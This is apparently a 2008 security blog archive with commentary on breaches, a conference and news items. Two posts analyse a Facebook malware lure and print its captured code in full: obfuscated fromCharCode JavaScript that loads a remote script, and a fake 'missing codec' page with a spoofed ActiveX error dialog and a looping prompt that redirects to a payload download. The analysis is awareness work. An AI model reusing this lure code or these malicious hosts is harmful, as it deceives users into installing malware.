Sunday, November 30, 2008

All-Time Best 404

Hope you're all having a good close to the long weekend...

I just had to share this. As I'm reading some posts and catching up from being off my computer for the last 2 days or so... I hit this on accident:

http://www.darkc0de.com/images/404.jpg

This is perhaps the best 404 ever.

Wednesday, November 26, 2008

Thanksgiving 2008...Give Thanks and Be Grateful

Happy Thanksgiving everyone, first and foremost.

Now let's get to it. Given that you're probably reading this on your day off, expecting family over or headed out yourself I will keep it short.

Thanksgiving Day here in the United States brings us to the thought of family, charity - and generally giving thanks for the blessings and good fortune in our lives. This year, on the eve of the US holiday, Mumbai was attacked by terrorists, and held hostage. From what I've been able to gather from news reports, view interviews and feeds and articles the whole attack was perpatrated by several people with a relatively low-tech attack. While the attacks were low-tech they were precise, deadly, and make no mistake... locked dow the entire city of Mumbai and killed at least 20, and injured at least 900. As the toll rises, I can't help but think of the ramifications for security and the blistering speed of "westernization" that India is undergoing.

I can't even begin to guess the percentage of companies that have data, infrastructure, and people over in India who will be impacted by this incident. The ramifications are much severe than the burned buildings and the hotels, cafes, and tourist spots leveled. There was a significant loss of life - but think of it this way - how easy was this?! From every report I've been able to find these attacks were simple to execute, and inflicted maximal damage with relatively little firepower. How protected is your physical and intellectual property overseas? Terrorism isn't just about killing people (although sometimes you wouldn't notice) but it's about disrupting Western life. Taking out a few major data centers, development centers, and IT centers in India would absolutely devastate many Western companies that are heavily outsourced into India and beyond.

So this Thanksgiving holiday... ask yourself how insulated your company is from catastrophic issues in the event this attack in Mumbai was just a pre-cursor to something much, much bigger.

Try not to choke on that turkey leg.


References:
[1] http://www.msnbc.msn.com/id/27928718?GT1=43001
[2] http://www.bloomberg.com/apps/news?pid=20601087&sid=asZkegbDKxQw&refer=home
[3] http://www.reuters.com/article/topNews/idUSTRE4AP6PI20081126?feedType=RSS&feedName=topNews

Sunday, November 23, 2008

A Perspective on National Security

My newswire inbox has been flooded over the past few days with articles about President-elect Obama's phone records being breached by unknown Verizon Wireless employees.

Then there was the matter of Sarah Palin's Yahoo! email being hacked (actually, password-hint guessed) which took center stage right as the election started to heat up down the stretch...

... and McCain and Obama's websites were hacked during the course of the election, multiple times as a matter of claims.

This brings me to what I want to draw your attention to - national security.  At which point in these data breaches did we cross over into a threat to national security?

Some would argue it happened when Palin's email was "hacked into"... possibly - but you have to ask yourself what sort of twit would discuss matters of national security over public webmail!

Others have tried to argue that Obama or McCain's sites being hacked was a matter of national security ... please, seriously?

This brings me to the matter of Obama's cell phone records being snooped.  Depending on which version of the story you believe, one of Obama's people says that the cell phone that was snooped on hadn't been used for a while, OK - but work with me on this one.  Cell phone records (numbers called, if voicemail was left, and such) are a dangerous tool.  Imagine if someone knew who you called - they could certainly use that to say, blackmail you, once you were in a position of power.  Call me a conspiracy theorist, but I'd say this could be a far more dangerous situation and requires Secret Service attention... not the rediculous things them and the FBI have been chasing lately.

You have to wonder... is our notion of national security in the digital realm as well-focused as it should be?  Do we properly understand the threats?  Furthermore, does our government, the people who send the big guns and write the laws, have the proper grasp technology that it should?

My obvious answer would be ... no.  So to the incoming President - please hire someone with a clue?

As a cynical side-note, someone identified as "Jeff" left this comment:

 
November 21st, 2008 9:54 pm ET

With all the wiretappings going on via Bush's WOT, why didn't Homeland Security discover this?

---Good one Jeff.

Tuesday, November 18, 2008

CSI Conference 2008 - Notes

Hey folks, in my other blog I published an entry of notes from the App Sec Summit, CSI Annual Conference here in Washington, DC.

Please give it a read, as it's a lot simpler to cross-post a link rather than re-writing the blog entry all over again.

Check it out!
http://www.communities.hp.com/securitysoftware/blogs/rafal/archive/2008/11/19/csi-annual-conference-take-aways-on-web-app-security.aspx

Monday, November 17, 2008

CSI 2008 - First Thoughts

So... my first impressions of this Computer Security Institute [CSI] 2008 conference here in National Harbor, MD - as follows:

  • Lots of people are here from all sorts of companies, and of all kinds of ranks, from all over the Americas (I saw name tags from Canada as well as the US; with CISOs, architects and engineers present)

  • The F5 "Email Station" kiosks - essentially a bunch of laptops which you can check email from. Seriously? At a security conference? And yes... there were people walking up and using webmail on these laptops. More proof that even with our own ranks, security people aren't paranoid enough - think keyloggers!




The morning's keynote was given in part by Brian Snow, of NSA fame. He had some bulletpoints I think would be good take-aways for everyone, my commentary is included:
  • "Better security" isn't a product we can sell to people, so it isn't happening effectively. Companies are in the business of making products (and selling them) and not securing you/us.

  • "Solving ahead" is a design process step by which we address all conceivable possible attacks against a "thing" before that thing is sent off for production. This process involves thinking many steps ahead of the initial attack and requires some smart people during the design phases... do you have those at your company?

  • An interesting topic (although not a new one) was brought back up about minimizing the contextual value of data - meaning, data stolen from one domain needs to be without value in another domain. How do we solve this issue? Credit card companies are already doing this with one-time use credit card numbers... what about other data?

  • Designers of software/hardware/stuff allow for bad decisions to be made by end-users. Why? This is a lot tougher to root out than you may think, people want those 'bad choices' in their options.

  • Learn to speak executive. If you don't have the ability to translate our "security geek" language into execu-speak you're going to continue to fail to make your point.

As a side note... are you an INTJ? How does that affect the way you design and solve problems? Think about it.

More soon...

Sunday, November 16, 2008

Nov 17th - CSI Conference

Hey everyone, as you read this I'll be attending the CSI Conference in National Harbor, MD.

Over the next 3 days I'll cover the conference, and some of the events, sessions and discussions that take place. This year promises to be one that we address how to fix some of the issues we've uncovered over the course of the past year or so. I was invited by Robert Richardson since I've been complaining publicly about the lack of "so now what" solutions to the problems we face and find.

Stay tuned, if you can't be here, hopefully I'll be able to convey some good information.

In the mean time, check out this weird case of Identity Theft uncovered in upstate New York. This has got to be one of the strangest [undated] "hacks" I've heard of recently. Hacking eBay isn't a new concept, neither is identity theft... but I thought this was rather clever.

[1] http://www.cbs6albany.com/news/chief_1258582___article.html/crimetracker_heider.html

Sunday, November 9, 2008

Facebook Worm/Hack Follow-Up...

If you haven't read the previous post on the FaceBook "email hack/possible worm", you can read it here first.

In response to the post, my friend Rob Ragan was kind enough to spend some of his time dissecting it and provided further analysis... Here is that analysis. Thanks to Rob for this.

------------------------------{analysis}-----------

Some googling after disecting the info below yielded this:
document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));


Writes out
{script src="http://lostart.info/js/js.js" /}

which contains
location="http://off34.com/go/fb.php/"

Which then gives a 302 redirect to
http://youtube-spyvideo.com/youtube_file.html

Which has an iframe like so
{IFRAME src="http://ahdirz.com/movie1.php?id=638&n=teen" height="100%" width="100%" border="0"}
Which gives us a final destination of
http://top100clipz.com/m6/movie1.php?id=638&n=teen
and this screen shot.

Thanks to all this:
{script language="javascript" src="http://top100clipz.com/popup/pop1_2007-09-04.js?id=638"}{/script}
{script language="javascript" src="http://top100clipz.com/popup/pre_2007-09-04.js?id=638"}{/script}
{script language="jscript.encode" src="http://top100clipz.com/popup/pop2_2007-09-04.js?id=638"}{/script}

{html lang="en-EN"}
{head}
{meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /}
{title}Movie{/title}
{style}
body,td,th,tr,a,img {cursor:default;}
#mainbody {background-color:#000;}
#movie {border:1px solid #fff;}
#movie a {cursor:pointer;}
{/style}
{script}
?function detecting(){
try
{
var testObject = new ActiveXObject("mu"+"lti"+"me"+"di"+"aCo"+"ntro"+"ls.c"+"hl");
return true;
}
catch(e)
{
;
}

return false;
}

function releaseMovie() {
if (detecting()) {
document.getElementById('playMov').innerHTML = '{embed src="http://dwnld-clips.com/movie.mpg" width="480" height="400" autostart="true" type="movie/mpg"}{/embed}';
}
}function codecDownload()
{
if (window.navigator.userAgent.indexOf("SV1") != -1 || window.navigator.userAgent.indexOf("MSIE 7") !=-1) {
return;
}
else {
window.setTimeout("location.href='http://www.cmplcoupler.com/download.php?id=638'", 3000);
}
}
{/script}
{/head}

{body id="mainbody"}{script}

var transcode = new Array;
window.transcode[0] = 'V'+'i'+'d'+'eo Act'+'iv'+'eX Obj'+'ect E'+'r'+'ror.\n\nY'+'o'+'ur brow'+'ser ca'+'nnot pl'+'a'+'y this vi'+'de'+'o file.\nCli'+'ck \'OK\' to dow'+'nlo'+'ad an'+'d install mis'+'sing V'+'id'+'eo Act'+'ive'+'X O'+'bj'+'ec'+'t.';
window.transcode[1] = 'Pl'+'e'+'as'+'e ins'+'ta'+'ll ne'+'w ve'+'rs'+'i'+'on of V'+'id'+'e'+'o Ac'+'ti'+'ve'+'X Ob'+'je'+'ct.';
window.transcode[2] = 'Yo'+'u m'+'us'+'t do'+'wn'+'lo'+'ad V'+'id'+'eo A'+'ct'+'iv'+'eX O'+'bject t'+'o pl'+'ay th'+'is v'+'ideo f'+'ile.';

{/script}
{script}

codecDownload();

{/script}
{script}

var Drag = {
obj : null,
init : function(o, oRoot, minX, maxX, minY, maxY, bSwapHorzRef, bSwapVertRef, fXMapper, fYMapper)
{
o.onmousedown = Drag.start;

o.hmode = bSwapHorzRef ? false : true ;
o.vmode = bSwapVertRef ? false : true ;

o.root = oRoot && oRoot != null ? oRoot : o ;

if (o.hmode && isNaN(parseInt(o.root.style.left ))) o.root.style.left = "0px";
if (o.vmode && isNaN(parseInt(o.root.style.top ))) o.root.style.top = "0px";
if (!o.hmode && isNaN(parseInt(o.root.style.right ))) o.root.style.right = "0px";
if (!o.vmode && isNaN(parseInt(o.root.style.bottom))) o.root.style.bottom = "0px";

o.minX = typeof minX != 'undefined' ? minX : null;
o.minY = typeof minY != 'undefined' ? minY : null;
o.maxX = typeof maxX != 'undefined' ? maxX : null;
o.maxY = typeof maxY != 'undefined' ? maxY : null;

o.xMapper = fXMapper ? fXMapper : null;
o.yMapper = fYMapper ? fYMapper : null;

o.root.onDragStart = new Function();
o.root.onDragEnd = new Function();
o.root.onDrag = new Function();
},

start : function(e)
{
var o = Drag.obj = this;
e = Drag.fixE(e);
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
o.root.onDragStart(x, y);

o.lastMouseX = e.clientX;
o.lastMouseY = e.clientY;

if (o.hmode) {
if (o.minX != null) o.minMouseX = e.clientX - x + o.minX;
if (o.maxX != null) o.maxMouseX = o.minMouseX + o.maxX - o.minX;
} else {
if (o.minX != null) o.maxMouseX = -o.minX + e.clientX + x;
if (o.maxX != null) o.minMouseX = -o.maxX + e.clientX + x;
}

if (o.vmode) {
if (o.minY != null) o.minMouseY = e.clientY - y + o.minY;
if (o.maxY != null) o.maxMouseY = o.minMouseY + o.maxY - o.minY;
} else {
if (o.minY != null) o.maxMouseY = -o.minY + e.clientY + y;
if (o.maxY != null) o.minMouseY = -o.maxY + e.clientY + y;
}

document.onmousemove = Drag.drag;
document.onmouseup = Drag.end;

return false;
},

drag : function(e)
{
e = Drag.fixE(e);
var o = Drag.obj;

var ey = e.clientY;
var ex = e.clientX;
var y = parseInt(o.vmode ? o.root.style.top : o.root.style.bottom);
var x = parseInt(o.hmode ? o.root.style.left : o.root.style.right );
var nx, ny;

if (o.minX != null) ex = o.hmode ? Math.max(ex, o.minMouseX) : Math.min(ex, o.maxMouseX);
if (o.maxX != null) ex = o.hmode ? Math.min(ex, o.maxMouseX) : Math.max(ex, o.minMouseX);
if (o.minY != null) ey = o.vmode ? Math.max(ey, o.minMouseY) : Math.min(ey, o.maxMouseY);
if (o.maxY != null) ey = o.vmode ? Math.min(ey, o.maxMouseY) : Math.max(ey, o.minMouseY);

nx = x + ((ex - o.lastMouseX) * (o.hmode ? 1 : -1));
ny = y + ((ey - o.lastMouseY) * (o.vmode ? 1 : -1));

if (o.xMapper) nx = o.xMapper(y)
else if (o.yMapper) ny = o.yMapper(x)

Drag.obj.root.style[o.hmode ? "left" : "right"] = nx + "px";
Drag.obj.root.style[o.vmode ? "top" : "bottom"] = ny + "px";
Drag.obj.lastMouseX = ex;
Drag.obj.lastMouseY = ey;

Drag.obj.root.onDrag(nx, ny);
return false;
},

end : function()
{
document.onmousemove = null;
document.onmouseup = null;
Drag.obj.root.onDragEnd( parseInt(Drag.obj.root.style[Drag.obj.hmode ? "left" : "right"]),
parseInt(Drag.obj.root.style[Drag.obj.vmode ? "top" : "bottom"]));
Drag.obj = null;
},

fixE : function(e)
{
if (typeof e == 'undefined') e = window.event;
if (typeof e.layerX == 'undefined') e.layerX = e.offsetX;
if (typeof e.layerY == 'undefined') e.layerY = e.offsetY;
return e;
}
};

function Downloadings(download,e)
{
if (e!=null && e.keyCode==27)
{ Close();
return;
}
switch (download)
{
case "iax": document.location.href="http://www.cmplcoupler.com/download.php?id=638"; break;
Close();
}

}

function tracking() {
if (confirm(window.transcode[0])) {
location.href="http://www.cmplcoupler.com/download.php?id=638";
}
else {
if (alert(window.transcode[1])) {
tracking();
}
else {
tracking();
}
}
}

function Close()
{
var p=document.getElementById("popdiv");
p.style.visibility="hidden";
tracking();
}
function Details()
{
alert(window.transcode[2]);
}

{/script}

{div name="popdiv" id="popdiv" onKeyPress="Downloadings('iax',event);" style="visibility:hidden; z-index:1;position:absolute;top:0px;left:0px;"}
{table width="474" cellpadding="0" cellspacing="0"}
{tr}
{td height="28" width="8" style="background-image:url(/img/vista-ltc.gif);"}{/td}
{td height="28" width="458" style="background-image:url(/img/vista-bgtop.gif);"}
{table width="458" cellpadding="0" cellspacing="0"}
{tr}
{td style="font-size: 12px; font-family:Segoe UI; color: #000000; padding-top:5px; padding-left: 6px;" id="w_title"}{/td}
{script} document.getElementById('w_title').innerHTML = "V"+"ide"+"o Ac"+"tiv"+"eX Ob"+"je"+"ct Er"+"ro"+"r.";{/script}
{td width="28" style="padding-top:6px; padding-right: 2px;"}{img src="/img/vista-close.gif" width="28" height="15" border="0" onClick="Close();" style="cursor:default;" /}{/td}
{/tr}
{/table}
{td height="28" width="8" style="background-image:url(/img/vista-rtc.gif);"}{/td}
{/tr}
{tr}
{td width="8" style="background-image:url(/img/vista-bgleft.gif);"}{/td}
{td width="458" style="background-image:url(/img/vista-1x1.gif);"}
{table width="458" cellpadding="0" cellspacing="8" style="padding-top:18px; padding-bottom:18px; background-image:url(/img/vista-1x1.gif);" align="center"}
{tr}
{td width="32" style="padding-left: 18px; vertical-align: top;"}{img src="/img/vista-alert.gif" width="32" height="32" border="0" /}{/td}
{td style="font-size: 12px; font-family:Segoe UI; text-align:justify; padding-left: 4px; padding-right: 20px;" id="w_content"}
{/td}
{script} document.getElementById('w_content').innerHTML = "Your bro"+"wser ca"+"nnot dis"+"play th"+"is vi"+"deo fi"+"le. You nee"+"d to dow"+"nload new "+"vers"+"ion of Vid"+"eo Ac"+"tiveX O"+"bject to play "+"this "+"video "+"file.{"+"br}{"+"br}You need"+" to do"+"wnload new"+" vers"+"ion of Vid"+"eo Ac"+"tiveX Obje"+"ct to p"+"lay th"+"is v"+"ideo f"+"ile.";{/script}
{/tr}
{/table}
{table width="458" height="52" cellpadding="0" cellspacing="0" style="background-color: #f0f0f0;padding-right: 8px;"}
{tr}
{td}
{table align="right" cellpadding="4" cellspacing="0"}
{tr}
{td}{input type="button" value="Continue" onClick="Downloadings('iax');" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" tabindex="1" ID="Button1" NAME="Button1"}{/td}
{td}{input type="button" value="Cancel" onClick="Close()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{td}{input type="button" value="Details..." onClick="Details()" style="font-size:12px; font-family:Segoe UI; height:24px; width:91px;" ID="Button3" NAME="Button3"}{/td}
{/tr}
{/table}
{/td}
{/tr}
{/table}
{/td}
{td width="8" style="background-image:url(/img/vista-bgright.gif);"}{/td}
{/tr}
{tr}
{td height="8" width="8" style="background-image:url(/img/vista-lbc.gif);"}{/td}
{td height="8" width="458" style="background-image:url(/img/vista-bgbottom.gif);"}{/td}
{td height="8" width="8" style="background-image:url(/img/vista-rbc.gif);"}{/td}
{/tr}
{/table}
{script}
if (navigator.userAgent.indexOf("Firefox")!=-1) {
if (detecting()) { } else {
setTimeout("Close();", 1000);
}
}
else {
if (detecting()) { } else {
setTimeout("showPopDiv();",2000);
}
}

function showPopDiv()
{
var sFlag = "No";
var byFlag = false;
var FlagAr = sFlag.split("");

if (FlagAr[0]=="1"){byFlag = true;}
if (FlagAr[0]=="3"){byFlag = true;}


if(!byFlag) {
var p=document.getElementById("popdiv");
wmpwidth=document.body.clientWidth/2-181;
wmpheight=document.body.clientHeight/2-120;
p.style.top = wmpheight;
p.style.left = wmpwidth;
p.style.visibility = "visible";
p.focus();
}
}

Drag.init(document.getElementById("popdiv"));
{/script}
{/div}

{table id="movie" align="center" cellpadding="0" cellspacing="0"}{tr}{td id="playMov"}{a href="http://www.cmplcoupler.com/download.php?id=638"}{img width="450" style="cursor:pointer;" onMouseOver="window.status = window.transcode[2];" height="369" border="0" alt="You must download Video ActiveX Object to play this video file." src="/img/mov.gif"/}{/a}{/td}{/tr}{/table}
{script}releaseMovie();{/script}

{/body}
{/html}
-----------------------------{/analysis}-----------

Final Word:
Wow! Thanks Rob for that analysis... Looking through all that code, redirects and mis-direction you can clearly see the final result is an attempt to get the user to install some setup.exe file, as a "missing codec" for whatever video you are presumably being redirected to. Fascinating! If anyone has been able to grab that setup.exe file please let me know, I have not been able to get it to download properly as of this morning.

Saturday, November 8, 2008

FaceBook Worm? Hack? or Worse?

Greetings from frigid Chicago!

For those of you who have accounts on these social networking sites, you know there is nothing more annoying than SPAM in your mailbox; or worse - some kind of nasty in there. Well, tonight I opened my FaceBook inbox and looked at a very strange-looking message from a friend. What struck me is that it wasn't someone that regularly sends me messages, much less links with cryptic and odd descriptions. Since this caught my attention, I decided to proceed further (using my VMWare sandbox, of course) and decided to document what I think may be a worm of some sort propagating. While I wouldn't normally jump to such a conslusion - I say this because I pinged my friend and asked him if he had sent the message and he had no idea what I was talking about.

Here's what I've been able to find so far.

1. First, let's look at the message itself (screen shot):


So I found this fascinating. First, it appears to be one of those "blanket messages" that would appear normal for most inboxes, except that the two of us generally don't send messages back and forth with cryptic subjects like that... much less such a cryptic body with strange link.

2. Then I decided to fire up my VMWare sandbox and follow the link, for better or worse; from within FaceBook. This is what I found...

I was fascinated that FaceBook was able to determine (through their internal workings) that the site I was about to navigate to was malicious. Interesting! Of course, this wouldn't deter me.

3. Navigating to that malicious site, using FireFox and NoScript on, I got this little gem captured for your viewing pleasure... What's interesting is that 76.x.x.x address there is my IP...


4. I then went and captured the landing page that gave me the above screen shot, the code from that page is here:
{script language="JavaScript"}var PUpage="76001548"; var PUprop="geocities"; {/script}{script language="JavaScript" src="http://www.geocities.com/js_source/pu5geo.js"}{/script}{script language="JavaScript"} var thGetOv="http://themis.geocities.yahoo.com/themis/h.php"; var thCanURL="http://us.geocities.com/adanbates84/index.htm"; var thSpaceId="76001548"; var thIP="76.243.224.30"; var thTs="1226206771"; var thCs="6903e27d9a64b4137d7d872f68c57349";{/script}{noscript}{link rel="stylesheet" href="http://themis.geocities.yahoo.com/jsoff.css?thIP=76.243.224.30&thTs=1226206771"}{/noscript}{script language="JavaScript" src="http://us.geocities.com/js_source/geovck08.js"}{/script}
{!-- text above generated by server. PLEASE REMOVE --}
{html}{head}{script}function handleError(){try{window.parent.location=location;}catch(e){}try{window.top.location=location;}catch(e){}}window.onerror=handleError;if(window.parent.frames.length}0){if(window.parent.document.body.innerHTML){}}{/script}{script}document.write(String.fromCharCode(96+60-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}{title}Angelina Jolie Fucking Cartoons{/title}{/head}{body}
{!-- following code added by server. PLEASE REMOVE --}
{link href="http://us.geocities.com/js_source/div.css" rel="stylesheet" type="text/css"}{script language="JavaScript" src="http://us.geocities.com/js_source/div03.js"}{/script}
{!-- preceding code added by server. PLEASE REMOVE --}This is video with you. You're doing something funny there.{/body}{/html}{!-- text below generated by server. PLEASE REMOVE --}{/object}{/layer}{/div}{/span}{/style}{/noscript}{/table}{/script}{/applet}{script language="JavaScript" src="http://us.i1.yimg.com/us.yimg.com/i/mc/mc.js"}{/script}{script language="JavaScript" src="http://us.js2.yimg.com/us.js.yimg.com/lib/smb/js/hosting/cp/js_source/geov2_001.js"}{/script}{script language="javascript"}geovisit();{/script}{noscript}{img src="http://visit.geocities.yahoo.com/visit.gif?us1226206771" alt="setstats" border="0" width="1" height="1"}{/noscript}

{IMG SRC="http://geo.yahoo.com/serv?s=76001548&t=1226206771&f=us-w90" ALT=1 WIDTH=1 HEIGHT=1}
I highlighted in red the part that I found most interesting. I haven't converted that yet - but will shortly and post that as well. I think it's interesting, at very least.

Here is that string again, in case Blogger doesn't wrap properly.
{script}document.write(String.fromCharCode(96+60-96,96+115
-96,96+99-96,96+114-96,96+105-96,96+112-96,96+116-96,96+
32-96,96+115-96,96+114-96,96+99-96,96+61-96,96+39-96,96+
104-96,96+116-96,96+116-96,96+112-96,96+58-96,96+47-96,
96+47-96,96+108-96,96+111-96,96+115-96,96+116-96,96+97-
96,96+114-96,96+116-96,96+46-96,96+105-96,96+110-96,96+
102-96,96+111-96,96+47-96,96+106-96,96+115-96,96+47-96,
96+106-96,96+115-96,96+46-96,96+106-96,96+115-96,96+39
-96,96+62-96,96+60-96,96+47-96,96+115-96,96+99-96,96+114
-96,96+105-96,96+112-96,96+116-96,96+62-96));{/script}


5. Within h.php I found something else that was interesting. Here that is:
{script language="JavaScript1.1" type="text/javascript"}

document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw0" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw0" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw0\')" onmouseover="return ss(\'go to phulki.com \',\'aw0\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Includes free web page, email & domain forwarding, 24-7 support." bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw1" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw1" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27176/*http://smallbusiness.yahoo.com/domains/" onfocus="ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseover="return ss(\'go to domains.yahoo.com \',\'aw1\')" onmouseout="cs()"}Great Value! Domain{br /}Names from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Includes free web page, email & domain forwarding, 24-7 support.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}domains.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Phulki is a FREE search engine for Bollywood Music. Take a spin !!" bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw2" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw2" target="_top" href="http://npgeodb3.geo.scd.yahoo.com/*http://www.phulki.com" onfocus="ss(\'go to phulki.com \',\'aw2\')" onmouseover="return ss(\'go to phulki.com \',\'aw2\')" onmouseout="cs()"}Enjoy Unlimited Desi Music{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Phulki is a FREE search engine for Bollywood Music. Take a spin !!{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}phulki.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');document.write('{/td}{/tr}{tr}{td height=12}{/td}{/tr}{tr}{td width=172 align=center valign=top}');document.write('{table title="Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived." bgcolor="#d6dbe7" border="0" cellpadding="1" cellspacing="0" height="" width="100%"}{tr}{td valign=top}{table bgcolor="#eff7ff" border="0" cellpadding="3" cellspacing="0" height="100%" width="100%"}{tr}{td valign=top id="taw3" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()" onclick="ga(this,event)" align="center"}{table border="0" cellpadding="1" cellspacing="0" height="100%" width="100%"}{tr valign=top}{td height=1 valign="top"}{font style="font-size: 10px; line-height : 12px;" color="#0000ff" face="verdana,sans-serif"}{b}{a id="aw3" target="_top" href="http://pa.yahoo.com/*http://us.rd.yahoo.com/evt=27190/*http://smallbusiness.yahoo.com/merchant?p=1" onfocus="ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseover="return ss(\'go to smallbusiness.yahoo.com \',\'aw3\')" onmouseout="cs()"}E-commerce Solutions{br /}from Yahoo!{/a}{/b}{/font}{/td}{/tr}{tr valign=top}{td valign=top}{font style="font-size: 10px;" color="#6b6b6b" face="verdana,sans-serif"}Reliable plans w/ free 24-7 support, domain, hosting, and email. $50 setup fee waived.{br}{/font}{font style="font-size: 10px;" color="008200" face="verdana,sans-serif"}smallbusiness.yahoo.com{/font}{/td}{/tr}{/table}{/td}{/tr}{/table}{/td}{/tr}{/table}');{/script}

So, while I'm doing some more analysis on this (feel free to contact me if you beat me to the punch, and I'll post it/credit you).

Thursday, November 6, 2008

Windows Crash at O'Hair Airport Terminal


In my travels I go through a lot of airports, and every once in a while I run into something that gets my attention and I have to pull out my cell phone camera and snap a picture. Coming home from Detroit tonight... I just had to have this for my "Priceless" collection.

I know, it's not necessarily a "security issue"... but it's a chuckle in a very tough week so bear with me. You'll notice that the offending driver is sysaudio.sys, which is strange because this terminal doesn't actually play any sound... ever that I've heard/seen when it was working.

We really are "Greening" the City of Chicago... wait, what?

Such a waste of a beautiful touch-screen display.

Tuesday, November 4, 2008

Is Nothing Sacred? Data Breach at Texas Lottery

[1] http://www.chron.com/disp/story.mpl/headline/metro/6089177.html

Apparently you're not even safe playing the Lottery lately.

In this article from October 31st (a little dated, I know, but just getting around to reading this) it's apparent that lax data security policies and poor judgment was the cause of this breach. What's astonishing is the complete and utter disregard this employee had for the super-sensitive data (including social security numbers) he "copied and burned to DVD"... what's even more disturbing is his motive:
"I indiscriminately copied all the files from the My DOC folder to a CD/DVD which I carried (to subsequent jobs)"... The employee added he wanted the information "for possible future reference as a programmer at other state agencies."
What possible future reference could he have had from this live data about real people? It continues to amaze me how people just haven't paid attention to the news media and other information outlets discussing how dangerous information like social security numbers is. Did this guy crawl out from under a rock?

Saturday, November 1, 2008

index.asp Server Error

Sometimes, words just don't do a broken index.asp page justice.

What's wrong with this picture?


Google+